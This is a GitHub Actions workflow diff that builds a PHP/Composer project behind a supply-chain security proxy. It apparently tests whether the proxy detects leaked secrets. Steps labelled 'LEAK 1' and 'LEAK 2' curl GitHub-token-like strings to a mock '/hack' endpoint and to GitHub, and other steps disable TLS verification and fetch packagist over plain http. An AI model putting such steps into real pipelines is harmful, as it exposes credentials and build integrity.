Create Secrets.yml

.github/workflows/Secrets.yml

@@ -0,0 +1,151 @@
+name: Build COMPOSER Package for Secrets
+on:
+  push:
+    branches: [ main ]
+  pull_request:
+    branches: [ main ]
+
+permissions:
+  checks: write
+  contents: read
+  packages: read
+env:
+  API_URL: https://app.stage.veribom.com
+
+jobs:
+  create_scan_in_IR_Portal:
+    runs-on: ubuntu-latest
+    outputs:
+      scan_id: ${{ steps.parseResponse.outputs.scan_id }}
+    steps:
+      - name: Initiating SBOM Scan
+        id: createScan
+        uses: fjogeleit/http-request-action@v1.15.1
+        with:
+          url: '${{env.API_URL}}/utilityapi/v1/scan'
+          method: 'POST'
+          data: '{"api_key": "${{secrets.VB_API_KEY_STAGE}}"}'
+      - name: Parse Response
+        id: parseResponse
+        run: echo "scan_id=${{fromJSON(steps.createScan.outputs.response).data.scan_id}}" >> "$GITHUB_OUTPUT"
+  ecr_details:
+    runs-on: ubuntu-latest
+    outputs:
+      ecr_username: ${{steps.ecr_details.outputs.username}}
+      ecr_token: ${{steps.ecr_details.outputs.token}}
+      ecr_region: ${{steps.ecr_details.outputs.region}}
+      ecr_id: ${{steps.ecr_details.outputs.registry_id}}
+    steps:
+      - name: Fetching VB Token
+        id: fetchECRDetails
+        uses: fjogeleit/http-request-action@v1.15.1
+        with:
+            url: '${{env.API_URL}}/utilityapi/v1/registry?api_key=${{secrets.VB_API_KEY_STAGE}}'
+            method: 'GET'
+      - name: Decoding VB Token
+        id: parseToken
+        run: echo "DECODED_TOKEN=$(echo ${{ fromJson(steps.fetchECRDetails.outputs.response).data }} | base64 -d)" >> "$GITHUB_OUTPUT"
+      - name: ECR Details
+        id: ecr_details
+        run: |
+          echo "username=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username}}" >> "$GITHUB_OUTPUT"
+          echo "token=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password}}" >> "$GITHUB_OUTPUT"
+          echo "region=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region}}" >> "$GITHUB_OUTPUT"
+          echo "registry_id=${{fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id}}" >> "$GITHUB_OUTPUT"
+          
+  start_proxy_and_build:
+    runs-on: ubuntu-latest
+    needs: [create_scan_in_IR_Portal, ecr_details]
+    services:
+      pse:
+        image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test
+        credentials:
+          username: ${{needs.ecr_details.outputs.ecr_username}}
+          password: ${{needs.ecr_details.outputs.ecr_token}}
+        env:
+          PSE_DEBUG_FLAG: --alsologtostderr
+          POLICY_LOG: t
+          INVISIRISK_JWT_TOKEN: ${{secrets.VB_API_KEY_STAGE}} 
+          INVISIRISK_PORTAL: https://app.stage.veribom.com
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 
+    container:
+      image: ubuntu:latest
+      options: --cap-add=NET_ADMIN
+    steps:
+      - name: Checkout the code
+        uses: actions/checkout@v3
+
+      - name: Install curl
+        run: |
+         apt-get update
+         apt-get install -y curl
+
+      - name: Set up PHP
+        uses: shivammathur/setup-php@v2
+        with:
+          php-version: "8.1"
+          extensions: pdo, pdo_mysql, gd
+
+      - name: Install system dependencies
+        run: |
+          sudo apt-get update
+          sudo apt-get install -y libpng-dev libjpeg-dev libfreetype6-dev zip unzip git apache2
+          
+      - name: Install Composer
+        run: |
+          php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
+          php composer-setup.php --install-dir=/usr/local/bin --filename=composer
+          php -r "unlink('composer-setup.php');"
+        #continue-on-error: false   # This will cause the step to fail if Composer installation fails
+
+      - name: Disable tls
+        run: |
+          composer config --global disable-tls true
+          
+      - name: Run PSE Action
+        uses: invisirisk/pse-action@v1.0.8
+        with:
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+          SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }}
+
+      - name: Configure CA Certificates
+        run: |
+          # Extract the path of the php.ini file
+          PHP_INI=$(php --ini | grep "Loaded Configuration File" | awk '{print $4}')
+          echo "$PHP_INI"
+          echo "curl.cainfo=/etc/ssl/certs/pse.pem" | sudo tee -a "$PHP_INI"
+          echo "openssl.cafile=/etc/ssl/certs/pse.pem" | sudo tee -a "$PHP_INI"
+
+      - name: User http for packagist
+        run: composer config -g repo.packagist composer http://repo.packagist.org
+
+      - name: Install project dependencies
+        run: |
+          composer install --no-scripts --no-autoloader --prefer-dist --no-cache
+        #continue-on-error: false  # This will stop the workflow if install fails
+
+      - name: Generate optimized autoload files
+        run: composer dump-autoload --optimize
+
+      - name: Set permissions
+        run: sudo chown -R www-data:www-data .
+
+      - name: Enable Apache mod_rewrite
+        run: sudo a2enmod rewrite
+
+      - name: Start Apache (if needed)
+        run: |
+          sudo service apache2 start
+          sudo apache2ctl configtest
+
+      - name: Send POST request with GitHub token (LEAK 1)
+        run: |
+          curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
+            -H "Content-Type: application/json" \
+            -d '{
+            "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
+          }'
+      - name: Make API Request (LEAK 2)
+        run: |
+         curl -k -X POST https://api.github.com/endpoint \
+          -d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}'